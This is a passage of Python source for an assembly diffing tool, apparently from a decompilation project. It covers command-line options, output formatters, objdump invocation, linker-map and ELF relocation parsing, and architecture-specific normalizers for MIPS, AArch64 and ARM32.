up with position 0x4321 in our img. Not supported together with -o.""",
)
parser.add_argument(
"-w",
"--watch",
dest="watch",
action="store_true",
help="""Automatically update when source/object files change.
Recommended in combination with -m.""",
)
parser.add_argument(
"-3",
"--threeway=prev",
dest="threeway",
action="store_const",
const="prev",
help="""Show a three-way diff between target asm, current asm, and asm
prior to -w rebuild. Requires -w.""",
)
parser.add_argument(
"-b",
"--threeway=base",
dest="threeway",
action="store_const",
const="base",
help="""Show a three-way diff between target asm, current asm, and asm
when diff.py was started. Requires -w.""",
)
parser.add_argument(
"--width",
dest="column_width",
metavar="COLS",
type=int,
default=50,
help="Sets the width of the left and right view column.",
)
parser.add_argument(
"--algorithm",
dest="algorithm",
default="levenshtein",
choices=["levenshtein", "difflib"],
help="""Diff algorithm to use. Levenshtein gives the minimum diff, while difflib
aims for long sections of equal opcodes. Defaults to %(default)s.""",
)
parser.add_argument(
"--max-size",
"--max-lines",
metavar="LINES",
dest="max_lines",
type=int,
default=1024,
help="The maximum length of the diff, in lines.",
)
parser.add_argument(
"--no-pager",
dest="no_pager",
action="store_true",
help="""Disable the pager; write output directly to stdout, then exit.
Incompatible with --watch.""",
)
parser.add_argument(
"--format",
choices=("color", "plain", "html", "json"),
default="color",
help="Output format, default is color. --format=html or json implies --no-pager.",
)
parser.add_argument(
"-U",
"--compress-matching",
metavar="N",
dest="compress_matching",
type=int,
help="""Compress streaks of matching lines, leaving N lines of context
around non-matching parts.""",
)
parser.add_argument(
"-V",
"--compress-sameinstr",
metavar="N",
dest="compress_sameinstr",
type=int,
help="""Compress streaks of lines with same instructions (but possibly
different regalloc), leaving N lines of context around other parts.""",
)
# Project-specific flags, e.g. different versions/make arguments.
add_custom_arguments_fn = getattr(diff_settings, "add_custom_arguments", None)
if add_custom_arguments_fn:
add_custom_arguments_fn(parser)
if argcomplete:
argcomplete.autocomplete(parser)
# ==== IMPORTS ====
# (We do imports late to optimize auto-complete performance.)
import abc
import ast
from collections import Counter, defaultdict
from dataclasses import asdict, dataclass, field, replace
import difflib
import enum
import html
import itertools
import json
import os
import queue
import re
import string
import struct
import subprocess
import threading
import time
import traceback
MISSING_PREREQUISITES = (
"Missing prerequisite python module {}. "
"Run `python3 -m pip install --user colorama watchdog python-Levenshtein cxxfilt` to install prerequisites (cxxfilt only needed with --source)."
)
try:
from colorama import Back, Fore, Style
import watchdog
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
# ==== CONFIG ====
@dataclass
class ProjectSettings:
arch_str: str
objdump_executable: str
build_command: List[str]
map_format: str
mw_build_dir: str
baseimg: Optional[str]
myimg: Optional[str]
mapfile: Optional[str]
source_directories: Optional[List[str]]
source_extensions: List[str]
show_line_numbers_default: bool
@dataclass
class Compress:
context: int
same_instr: bool
@dataclass
class Config:
arch: "ArchSettings"
# Build/objdump options
diff_obj: bool
make: bool
source_old_binutils: bool
inlines: bool
max_function_size_lines: int
max_function_size_bytes: int
# Display options
formatter: "Formatter"
threeway: Optional[str]
base_shift: int
skip_lines: int
compress: Optional[Compress]
show_branches: bool
show_line_numbers: bool
show_source: bool
stop_jrra: bool
ignore_large_imms: bool
ignore_addr_diffs: bool
algorithm: str
# Score options
score_stack_differences = True
penalty_stackdiff = 1
penalty_regalloc = 5
penalty_reordering = 60
penalty_insertion = 100
penalty_deletion = 100
def create_project_settings(settings: Dict[str, Any]) -> ProjectSettings:
return ProjectSettings(
arch_str=settings.get("arch", "mips"),
baseimg=settings.get("baseimg"),
myimg=settings.get("myimg"),
mapfile=settings.get("mapfile"),
build_command=settings.get(
"make_command", ["make", *settings.get("makeflags", [])]
),
source_directories=settings.get("source_directories"),
source_extensions=settings.get(
"source_extensions", [".c", ".h", ".cpp", ".hpp", ".s"]
),
objdump_executable=get_objdump_executable(settings.get("objdump_executable")),
map_format=settings.get("map_format", "gnu"),
mw_build_dir=settings.get("mw_build_dir", "build/"),
show_line_numbers_default=settings.get("show_line_numbers_default", True),
)
def create_config(args: argparse.Namespace, project: ProjectSettings) -> Config:
arch = get_arch(project.arch_str)
formatter: Formatter
if args.format == "plain":
formatter = PlainFormatter(column_width=args.column_width)
elif args.format == "color":
formatter = AnsiFormatter(column_width=args.column_width)
elif args.format == "html":
formatter = HtmlFormatter()
elif args.format == "json":
formatter = JsonFormatter(arch_str=arch.name)
else:
raise ValueError(f"Unsupported --format: {args.format}")
compress = None
if args.compress_matching is not None:
compress = Compress(args.compress_matching, False)
if args.compress_sameinstr is not None:
if compress is not None:
raise ValueError(
"Cannot pass both --compress-matching and --compress-sameinstr"
)
compress = Compress(args.compress_sameinstr, True)
show_line_numbers = args.show_line_numbers
if show_line_numbers is None:
show_line_numbers = project.show_line_numbers_default
return Config(
arch=arch,
# Build/objdump options
diff_obj=args.diff_obj,
make=args.make,
source_old_binutils=args.source_old_binutils,
inlines=args.inlines,
max_function_size_lines=args.max_lines,
max_function_size_bytes=args.max_lines * 4,
# Display options
formatter=formatter,
threeway=args.threeway,
base_shift=eval_int(
args.base_shift, "Failed to parse --base-shift (-S) argument as an integer."
),
skip_lines=args.skip_lines,
compress=compress,
show_branches=args.show_branches,
show_line_numbers=show_line_numbers,
show_source=args.show_source or args.source_old_binutils,
stop_jrra=args.stop_jrra,
ignore_large_imms=args.ignore_large_imms,
ignore_addr_diffs=args.ignore_addr_diffs,
algorithm=args.algorithm,
)
def get_objdump_executable(objdump_executable: Optional[str]) -> str:
if objdump_executable is not None:
return objdump_executable
objdump_candidates = [
"mips-linux-gnu-objdump",
"mips64-elf-objdump",
"mips-elf-objdump",
]
for objdump_cand in objdump_candidates:
try:
subprocess.check_call(
[objdump_cand, "--version"],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
return objdump_cand
except subprocess.CalledProcessError:
pass
except FileNotFoundError:
pass
return fail(
f"Missing binutils; please ensure {' or '.join(objdump_candidates)} exists, or configure objdump_executable."
)
def get_arch(arch_str: str) -> "ArchSettings":
for settings in ARCH_SETTINGS:
if arch_str == settings.name:
return settings
raise ValueError(f"Unknown architecture: {arch_str}")
BUFFER_CMD: List[str] = ["tail", "-c", str(10 ** 9)]
# -S truncates long lines instead of wrapping them
# -R interprets color escape sequences
# -i ignores case when searching
# -c causes full screen repaints to be painted from the top line down
# -#6 makes left/right arrow keys scroll by 6 characters
LESS_CMD: List[str] = ["less", "-SRic", "-#6"]
DEBOUNCE_DELAY: float = 0.1
# ==== FORMATTING ====
@enum.unique
class BasicFormat(enum.Enum):
NONE = enum.auto()
IMMEDIATE = enum.auto()
STACK = enum.auto()
REGISTER = enum.auto()
DELAY_SLOT = enum.auto()
DIFF_CHANGE = enum.auto()
DIFF_ADD = enum.auto()
DIFF_REMOVE = enum.auto()
SOURCE_FILENAME = enum.auto()
SOURCE_FUNCTION = enum.auto()
SOURCE_LINE_NUM = enum.auto()
SOURCE_OTHER = enum.auto()
@dataclass(frozen=True)
class RotationFormat:
group: str
index: int
key: str
Format = Union[BasicFormat, RotationFormat]
FormatFunction = Callable[[str], Format]
class Text:
segments: List[Tuple[str, Format]]
def __init__(self, line: str = "", f: Format = BasicFormat.NONE) -> None:
self.segments = [(line, f)] if line else []
def reformat(self, f: Format) -> "Text":
return Text(self.plain(), f)
def plain(self) -> str:
return "".join(s for s, f in self.segments)
def __repr__(self) -> str:
return f"<Text: {self.plain()!r}>"
def __bool__(self) -> bool:
return any(s for s, f in self.segments)
def __str__(self) -> str:
# Use Formatter.apply(...) instead
return NotImplemented
def __eq__(self, other: object) -> bool:
return NotImplemented
def __add__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
# If two adjacent segments have the same format, merge their lines
if (
self.segments
and other.segments
and self.segments[-1][1] == other.segments[0][1]
):
result.segments = (
self.segments[:-1]
+ [(self.segments[-1][0] + other.segments[0][0], self.segments[-1][1])]
+ other.segments[1:]
)
else:
result.segments = self.segments + other.segments
return result
def __radd__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
return other + self
def finditer(self, pat: Pattern[str]) -> Iterator[Match[str]]:
"""Replacement for `pat.finditer(text)` that operates on the inner text,
and returns the exact same matches as `Text.sub(pat, ...)`."""
for chunk, f in self.segments:
for match in pat.finditer(chunk):
yield match
def sub(self, pat: Pattern[str], sub_fn: Callable[[Match[str]], "Text"]) -> "Text":
result = Text()
for chunk, f in self.segments:
i = 0
for match in pat.finditer(chunk):
start, end = match.start(), match.end()
assert i <= start <= end <= len(chunk)
sub = sub_fn(match)
if i != start:
result.segments.append((chunk[i:start], f))
result.segments.extend(sub.segments)
i = end
if chunk[i:]:
result.segments.append((chunk[i:], f))
return result
def ljust(self, column_width: int) -> "Text":
length = sum(len(x) for x, _ in self.segments)
return self + " " * max(column_width - length, 0)
@dataclass
class TableMetadata:
headers: Tuple[Text, ...]
current_score: int
max_score: int
previous_score: Optional[int]
class Formatter(abc.ABC):
@abc.abstractmethod
def apply_format(self, chunk: str, f: Format) -> str:
"""Apply the formatting `f` to `chunk` and escape the contents."""
...
@abc.abstractmethod
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
"""Format a multi-column table with metadata"""
...
def apply(self, text: Text) -> str:
return "".join(self.apply_format(chunk, f) for chunk, f in text.segments)
@staticmethod
def outputline_texts(lines: Tuple["OutputLine", ...]) -> Tuple[Text, ...]:
return tuple([lines[0].base or Text()] + [line.fmt2 for line in lines[1:]])
@dataclass
class PlainFormatter(Formatter):
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
return chunk
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [meta.headers] + [self.outputline_texts(ls) for ls in lines]
return "\n".join(
"".join(self.apply(x.ljust(self.column_width)) for x in row) for row in rows
)
@dataclass
class AnsiFormatter(Formatter):
# Additional ansi escape codes not in colorama. See:
# https://en.wikipedia.org/wiki/ANSI_escape_code#SGR_(Select_Graphic_Rendition)_parameters
STYLE_UNDERLINE = "\x1b[4m"
STYLE_NO_UNDERLINE = "\x1b[24m"
STYLE_INVERT = "\x1b[7m"
BASIC_ANSI_CODES = {
BasicFormat.NONE: "",
BasicFormat.IMMEDIATE: Fore.LIGHTBLUE_EX,
BasicFormat.STACK: Fore.YELLOW,
BasicFormat.REGISTER: Fore.YELLOW,
BasicFormat.DELAY_SLOT: Fore.LIGHTBLACK_EX,
BasicFormat.DIFF_CHANGE: Fore.LIGHTBLUE_EX,
BasicFormat.DIFF_ADD: Fore.GREEN,
BasicFormat.DIFF_REMOVE: Fore.RED,
BasicFormat.SOURCE_FILENAME: Style.DIM + Style.BRIGHT,
BasicFormat.SOURCE_FUNCTION: Style.DIM + Style.BRIGHT + STYLE_UNDERLINE,
BasicFormat.SOURCE_LINE_NUM: Fore.LIGHTBLACK_EX,
BasicFormat.SOURCE_OTHER: Style.DIM,
}
BASIC_ANSI_CODES_UNDO = {
BasicFormat.NONE: "",
BasicFormat.SOURCE_FILENAME: Style.NORMAL,
BasicFormat.SOURCE_FUNCTION: Style.NORMAL + STYLE_NO_UNDERLINE,
BasicFormat.SOURCE_OTHER: Style.NORMAL,
}
ROTATION_ANSI_COLORS = [
Fore.MAGENTA,
Fore.CYAN,
Fore.GREEN,
Fore.RED,
Fore.LIGHTYELLOW_EX,
Fore.LIGHTMAGENTA_EX,
Fore.LIGHTCYAN_EX,
Fore.LIGHTGREEN_EX,
Fore.LIGHTBLACK_EX,
]
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
if f == BasicFormat.NONE:
return chunk
undo_ansi_code = Fore.RESET
if isinstance(f, BasicFormat):
ansi_code = self.BASIC_ANSI_CODES[f]
undo_ansi_code = self.BASIC_ANSI_CODES_UNDO.get(f, undo_ansi_code)
elif isinstance(f, RotationFormat):
ansi_code = self.ROTATION_ANSI_COLORS[
f.index % len(self.ROTATION_ANSI_COLORS)
]
else:
static_assert_unreachable(f)
return f"{ansi_code}{chunk}{undo_ansi_code}"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [(meta.headers, False)] + [
(self.outputline_texts(line), line[1].is_data_ref) for line in lines
]
return "\n".join(
"".join(
(self.STYLE_INVERT if is_data_ref else "")
+ self.apply(x.ljust(self.column_width))
for x in row
)
for (row, is_data_ref) in rows
)
@dataclass
class HtmlFormatter(Formatter):
rotation_formats: int = 9
def apply_format(self, chunk: str, f: Format) -> str:
chunk = html.escape(chunk)
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
class_name = f.name.lower().replace("_", "-")
data_attr = ""
elif isinstance(f, RotationFormat):
class_name = f"rotation-{f.index % self.rotation_formats}"
rotation_key = html.escape(f"{f.group};{f.key}", quote=True)
data_attr = f'data-rotation="{rotation_key}"'
else:
static_assert_unreachable(f)
return f"<span class='{class_name}' {data_attr}>{chunk}</span>"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
def table_row(line: Tuple[Text, ...], is_data_ref: bool, cell_el: str) -> str:
tr_attrs = " class='data-ref'" if is_data_ref else ""
output_row = f" <tr{tr_attrs}>"
for cell in line:
cell_html = self.apply(cell)
output_row += f"<{cell_el}>{cell_html}</{cell_el}>"
output_row += "</tr>\n"
return output_row
output = "<table class='diff'>\n"
output += " <thead>\n"
output += table_row(meta.headers, False, "th")
output += " </thead>\n"
output += " <tbody>\n"
output += "".join(
table_row(self.outputline_texts(line), line[1].is_data_ref, "td")
for line in lines
)
output += " </tbody>\n"
output += "</table>\n"
return output
@dataclass
class JsonFormatter(Formatter):
arch_str: str
def apply_format(self, chunk: str, f: Format) -> str:
# This method is unused by this formatter
return NotImplemented
def table(self, meta: TableMetadata, rows: List[Tuple["OutputLine", ...]]) -> str:
def serialize_format(s: str, f: Format) -> Dict[str, Any]:
if f == BasicFormat.NONE:
return {"text": s}
elif isinstance(f, BasicFormat):
return {"text": s, "format": f.name.lower()}
elif isinstance(f, RotationFormat):
attrs = asdict(f)
attrs.update(
{
"text": s,
"format": "rotation",
}
)
return attrs
else:
static_assert_unreachable(f)
def serialize(text: Optional[Text]) -> List[Dict[str, Any]]:
if text is None:
return []
return [serialize_format(s, f) for s, f in text.segments]
is_threeway = len(meta.headers) == 3
output: Dict[str, Any] = {}
output["arch_str"] = self.arch_str
output["header"] = {
name: serialize(h)
for h, name in zip(meta.headers, ("base", "current", "previous"))
}
output["current_score"] = meta.current_score
output["max_score"] = meta.max_score
if meta.previous_score is not None:
output["previous_score"] = meta.previous_score
output_rows: List[Dict[str, Any]] = []
for row in rows:
output_row: Dict[str, Any] = {}
output_row["key"] = row[0].key2
output_row["is_data_ref"] = row[1].is_data_ref
iters = [
("base", row[0].base, row[0].line1),
("current", row[1].fmt2, row[1].line2),
]
if is_threeway:
iters.append(("previous", row[2].fmt2, row[2].line2))
if all(line is None for _, _, line in iters):
# Skip rows that were only for displaying source code
continue
for column_name, text, line in iters:
column: Dict[str, Any] = {}
column["text"] = serialize(text)
if line:
if line.line_num is not None:
column["line"] = line.line_num
if line.branch_target is not None:
column["branch"] = line.branch_target
if line.source_lines:
column["src"] = line.source_lines
if line.comment is not None:
column["src_comment"] = line.comment
if line.source_line_num is not None:
column["src_line"] = line.source_line_num
if line or column["text"]:
output_row[column_name] = column
output_rows.append(output_row)
output["rows"] = output_rows
return json.dumps(output)
def format_fields(
pat: Pattern[str],
out1: Text,
out2: Text,
color1: FormatFunction,
color2: Optional[FormatFunction] = None,
) -> Tuple[Text, Text]:
diffs = [
of.group() != nf.group()
for (of, nf) in zip(out1.finditer(pat), out2.finditer(pat))
]
it = iter(diffs)
def maybe_color(color: FormatFunction, s: str) -> Text:
return Text(s, color(s)) if next(it, False) else Text(s)
out1 = out1.sub(pat, lambda m: maybe_color(color1, m.group()))
it = iter(diffs)
out2 = out2.sub(pat, lambda m: maybe_color(color2 or color1, m.group()))
return out1, out2
def symbol_formatter(group: str, base_index: int) -> FormatFunction:
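# Usage sketch (mirrors the calls in do_diff below): sc = symbol_formatter("base-reg", 0)
# returns a closure; sc("$a0") allocates a RotationFormat with index 0, repeated
# calls with "$a0" return the same cached format, and each new symbol gets the
# next index (offset by base_index).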
symbol_formats: Dict[str, Format] = {}
def symbol_format(s: str) -> Format:
# TODO: it would be nice to use a unique Format for each symbol, so we could
# add extra UI elements in the HTML version
f = symbol_formats.get(s)
if f is None:
index = len(symbol_formats) + base_index
f = RotationFormat(key=s, index=index, group=group)
symbol_formats[s] = f
return f
return symbol_format
# ==== LOGIC ====
ObjdumpCommand = Tuple[List[str], str, Optional[str]]
def maybe_eval_int(expr: str) -> Optional[int]:
try:
ret = ast.literal_eval(expr)
if not isinstance(ret, int):
raise Exception("not an integer")
return ret
except Exception:
return None
def eval_int(expr: str, emsg: str) -> int:
ret = maybe_eval_int(expr)
if ret is None:
fail(emsg)
return ret
def eval_line_num(expr: str) -> Optional[int]:
expr = expr.strip().replace(":", "")
if expr == "":
return None
return int(expr, 16)
def run_make(target: str, project: ProjectSettings) -> None:
subprocess.check_call(project.build_command + [target])
def run_make_capture_output(
target: str, project: ProjectSettings
) -> "subprocess.CompletedProcess[bytes]":
return subprocess.run(
project.build_command + [target],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
def restrict_to_function(dump: str, fn_name: str) -> str:
try:
ind = dump.index("\n", dump.index(f"<{fn_name}>:"))
return dump[ind + 1 :]
except ValueError:
return ""
def serialize_data_references(references: List[Tuple[int, int, str]]) -> str:
return "".join(
f"DATAREF {text_offset} {from_offset} {from_section}\n"
for (text_offset, from_offset, from_section) in references
)
def maybe_get_objdump_source_flags(config: Config) -> List[str]:
flags = []
if config.show_line_numbers or config.show_source:
flags.append("--line-numbers")
if config.show_source:
flags.append("--source")
if not config.source_old_binutils:
flags.append("--source-comment=│ ")
if config.inlines:
flags.append("--inlines")
return flags
def run_objdump(cmd: ObjdumpCommand, config: Config, project: ProjectSettings) -> str:
flags, target, restrict = cmd
try:
out = subprocess.run(
[project.objdump_executable] + config.arch.arch_flags + flags + [target],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
).stdout
except subprocess.CalledProcessError as e:
print(e.stdout)
print(e.stderr)
if "unrecognized option '--source-comment" in e.stderr:
fail("** Try using --source-old-binutils instead of --source **")
raise e
obj_data: Optional[bytes] = None
if config.diff_obj:
with open(target, "rb") as f:
obj_data = f.read()
return preprocess_objdump_out(restrict, obj_data, out)
def preprocess_objdump_out(
restrict: Optional[str], obj_data: Optional[bytes], objdump_out: str
) -> str:
"""
Preprocess the output of objdump into a format that `process()` expects.
This format is suitable for saving to disk with `--write-asm`.
- Optionally filter the output to a single function (`restrict`)
- Otherwise, strip objdump header (7 lines)
- Prepend .data references ("DATAREF" lines) when working with object files
"""
out = objdump_out
if restrict is not None:
out = restrict_to_function(out, restrict)
else:
for i in range(7):
out = out[out.find("\n") + 1 :]
out = out.rstrip("\n")
if obj_data:
out = serialize_data_references(parse_elf_data_references(obj_data)) + out
return out
def search_map_file(
fn_name: str, project: ProjectSettings
) -> Tuple[Optional[str], Optional[int]]:
if not project.mapfile:
fail(f"No map file configured; cannot find function {fn_name}.")
try:
with open(project.mapfile) as f:
contents = f.read()
except Exception:
fail(f"Failed to open map file {project.mapfile} for reading.")
if project.map_format == "gnu":
lines = contents.split("\n")
try:
cur_objfile = None
ram_to_rom = None
cands = []
last_line = ""
for line in lines:
if line.startswith(" .text"):
cur_objfile = line.split()[3]
if "load address" in line:
tokens = last_line.split() + line.split()
ram = int(tokens[1], 0)
rom = int(tokens[5], 0)
ram_to_rom = rom - ram
if line.endswith(" " + fn_name):
ram = int(line.split()[0], 0)
if cur_objfile is not None and ram_to_rom is not None:
cands.append((cur_objfile, ram + ram_to_rom))
last_line = line
except Exception as e:
traceback.print_exc()
fail(f"Internal error while parsing map file")
if len(cands) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(cands) == 1:
return cands[0]
elif project.map_format == "mw":
find = re.findall(
re.compile(
# ram elf rom
r" \S+ \S+ (\S+) (\S+) . "
+ fn_name
# object name
+ r"(?: \(entry of \.(?:init|text)\))? \t(\S+)"
),
contents,
)
if len(find) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(find) == 1:
rom = int(find[0][1], 16)
objname = find[0][2]
# The metrowerks linker map format does not contain the full object path,
# so we must complete it manually.
objfiles = [
os.path.join(dirpath, f)
for dirpath, _, filenames in os.walk(project.mw_build_dir)
for f in filenames
if f == objname
]
if len(objfiles) > 1:
all_objects = "\n".join(objfiles)
fail(
f"Found multiple objects of the same name {objname} in {project.mw_build_dir}, "
f"cannot determine which to diff against: \n{all_objects}"
)
if len(objfiles) == 1:
objfile = objfiles[0]
# TODO Currently the ram-rom conversion only works for diffing ELF
# executables, but it would likely be more convenient to diff DOLs.
# At this time it is recommended to always use -o when running the diff
# script as this mode does not make use of the ram-rom conversion.
return objfile, rom
else:
fail(f"Linker map format {project.map_format} unrecognised.")
return None, None
def parse_elf_data_references(data: bytes) -> List[Tuple[int, int, str]]:
e_ident = data[:16]
if e_ident[:4] != b"\x7FELF":
return []
SHT_SYMTAB = 2
SHT_REL = 9
SHT_RELA = 4
is_32bit = e_ident[4] == 1
is_little_endian = e_ident[5] == 1
str_end = "<" if is_little_endian else ">"
str_off = "I" if is_32bit else "Q"
sym_size = {"B": 1, "H": 2, "I": 4, "Q": 8}
def read(spec: str, offset: int) -> Tuple[int, ...]:
spec = spec.replace("P", str_off)
size = struct.calcsize(spec)
return struct.unpack(str_end + spec, data[offset : offset + size])
(
e_type,
e_machine,
e_version,
e_entry,
e_phoff,
e_shoff,
e_flags,
e_ehsize,
e_phentsize,
e_phnum,
e_shentsize,
e_shnum,
e_shstrndx,
) = read("HHIPPPIHHHHHH", 16)
if e_type != 1: # relocatable
return []
assert e_shoff != 0
assert e_shnum != 0 # don't support > 0xFF00 sections
assert e_shstrndx != 0
@dataclass
class Section:
sh_name: int
sh_type: int
sh_flags: int
sh_addr: int
sh_offset: int
sh_size: int
sh_link: int
sh_info: int
sh_addralign: int
sh_entsize: int
sections = [
Section(*read("IIPPPPIIPP", e_shoff + i * e_shentsize)) for i in range(e_shnum)
]
shstr = sections[e_shstrndx]
sec_name_offs = [shstr.sh_offset + s.sh_name for s in sections]
sec_names = [data[offset : data.index(b"\0", offset)] for offset in sec_name_offs]
symtab_sections = [i for i in range(e_shnum) if sections[i].sh_type == SHT_SYMTAB]
assert len(symtab_sections) == 1
symtab = sections[symtab_sections[0]]
text_sections = [i for i in range(e_shnum) if sec_names[i] == b".text"]
assert len(text_sections) == 1
text_section = text_sections[0]
ret: List[Tuple[int, int, str]] = []
for s in sections:
if s.sh_type == SHT_REL or s.sh_type == SHT_RELA:
if s.sh_info == text_section:
# Skip .text -> .text references
continue
sec_name = sec_names[s.sh_info].decode("latin1")
sec_base = sections[s.sh_info].sh_offset
for i in range(0, s.sh_size, s.sh_entsize):
if s.sh_type == SHT_REL:
r_offset, r_info = read("PP", s.sh_offset + i)
else:
r_offset, r_info, r_addend = read("PPP", s.sh_offset + i)
if is_32bit:
r_sym = r_info >> 8
r_type = r_info & 0xFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_value, st_size, st_info, st_other, st_shndx = read(
"IIIBBH", sym_offset
)
else:
r_sym = r_info >> 32
r_type = r_info & 0xFFFFFFFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_info, st_other, st_shndx, st_value, st_size = read(
"IBBHQQ", sym_offset
)
if st_shndx == text_section:
if s.sh_type == SHT_REL:
if e_machine == 8 and r_type == 2: # R_MIPS_32
(r_addend,) = read("I", sec_base + r_offset)
else:
continue
text_offset = (st_value + r_addend) & 0xFFFFFFFF
ret.append((text_offset, r_offset, sec_name))
return ret
def dump_elf(
start: str,
end: Optional[str],
diff_elf_symbol: str,
config: Config,
project: ProjectSettings,
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.base_shift:
fail("--base-shift not compatible with -e")
start_addr = eval_int(start, "Start address must be an integer expression.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
flags1 = [
f"--start-address={start_addr}",
f"--stop-address={end_addr}",
]
flags2 = [
f"--disassemble={diff_elf_symbol}",
]
objdump_flags = ["-drz", "-j", ".text"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(
objdump_flags + flags2 + maybe_get_objdump_source_flags(config),
project.myimg,
None,
),
)
def dump_objfile(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if config.base_shift:
fail("--base-shift not compatible with -o")
if end is not None:
fail("end address not supported together with -o")
if start.startswith("0"):
fail("numerical start address not supported with -o; pass a function name")
objfile, _ = search_map_file(start, project)
if not objfile:
fail("Not able to find .o file for function.")
if config.make:
run_make(objfile, project)
if not os.path.isfile(objfile):
fail(f"Not able to find .o file for function: {objfile} is not a file.")
refobjfile = "expected/" + objfile
if not os.path.isfile(refobjfile):
fail(f'Please ensure an OK .o file exists at "{refobjfile}".')
objdump_flags = ["-drz", "-j", ".text"]
return (
objfile,
(objdump_flags, refobjfile, start),
(objdump_flags + maybe_get_objdump_source_flags(config), objfile, start),
)
def dump_binary(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.make:
run_make(project.myimg, project)
start_addr = maybe_eval_int(start)
if start_addr is None:
_, start_addr = search_map_file(start, project)
if start_addr is None:
fail("Not able to find function in map file.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
objdump_flags = ["-Dz", "-bbinary"] + ["-EB" if config.arch.big_endian else "-EL"]
flags1 = [
f"--start-address={start_addr + config.base_shift}",
f"--stop-address={end_addr + config.base_shift}",
]
flags2 = [f"--start-address={start_addr}", f"--stop-address={end_addr}"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(objdump_flags + flags2, project.myimg, None),
)
class DifferenceNormalizer:
def __init__(self, config: Config) -> None:
self.config = config
def normalize(self, mnemonic: str, row: str) -> str:
"""This should be called exactly once for each line."""
arch = self.config.arch
row = self._normalize_arch_specific(mnemonic, row)
if self.config.ignore_large_imms and mnemonic not in arch.branch_instructions:
row = re.sub(self.config.arch.re_large_imm, "<imm>", row)
return row
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
return row
class DifferenceNormalizerAArch64(DifferenceNormalizer):
def __init__(self, config: Config) -> None:
super().__init__(config)
self._adrp_pair_registers: Set[str] = set()
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_adrp_differences(mnemonic, row)
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
return row + "<ignore>"
def _normalize_adrp_differences(self, mnemonic: str, row: str) -> str:
"""Identifies ADRP + LDR/ADD pairs that are used to access the GOT and
suppresses any immediate differences.
Whenever an ADRP is seen, the destination register is added to the set of registers
that are part of an ADRP + LDR/ADD pair. Registers are removed from the set as soon
as they are used for an LDR or ADD instruction which completes the pair.
This method is somewhat crude but should manage to detect most such pairs.
"""
row_parts = row.split("\t", 1)
if mnemonic == "adrp":
self._adrp_pair_registers.add(row_parts[1].strip().split(",")[0])
row, _ = split_off_address(row)
return row + "<ignore>"
elif mnemonic == "ldr":
for reg in self._adrp_pair_registers:
# ldr xxx, [reg]
# ldr xxx, [reg, <imm>]
if f", [{reg}" in row_parts[1]:
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
elif mnemonic == "add":
for reg in self._adrp_pair_registers:
# add reg, reg, <imm>
if row_parts[1].startswith(f"{reg}, {reg}, "):
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
return row
class DifferenceNormalizerARM32(DifferenceNormalizer):
def __init__(self, config: Config) -> None:
super().__init__(config)
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
return row + "<ignore>"
@dataclass
class ArchSettings:
name: str
re_int: Pattern[str]
re_comment: Pattern[str]
re_reg: Pattern[str]
re_sprel: Pattern[str]
re_large_imm: Pattern[str]
re_imm: Pattern[str]
branch_instructions: Set[str]
instructions_with_address_immediates: Set[str]
forbidden: Set[str] = field(default_factory=lambda: set(string.ascii_letters + "_"))
arch_flags: List[str] = field(default_factory=list)
branch_likely_instructions: Set[str] = field(default_factory=set)
difference_normalizer: Type[DifferenceNormalizer] = DifferenceNormalizer
big_endian: Optional[bool] = True
delay_slot_instructions: Set[str] = field(default_factory=set)
MIPS_BRANCH_LIKELY_INSTRUCTIONS = {
"beql",
"bnel",
"beqzl",
"bnezl",
"bgezl",
"bgtzl",
"blezl",
"bltzl",
"bc1tl",
"bc1fl",
}
MIPS_BRANCH_INSTRUCTIONS = MIPS_BRANCH_LIKELY_INSTRUCTIONS.union(
{
"b",
"beq",
"bne",
"beqz",
"bnez",
"bgez",
"bgtz",
"blez",
"bltz",
"bc1t",
"bc1f",
}
)
ARM32_PREFIXES = {"b", "bl"}
ARM32_CONDS = {
"",
"eq",
"ne",
"cs",
"cc",
"mi",
"pl",
"vs",
"vc",
"hi",
"ls",
"ge",
"lt",
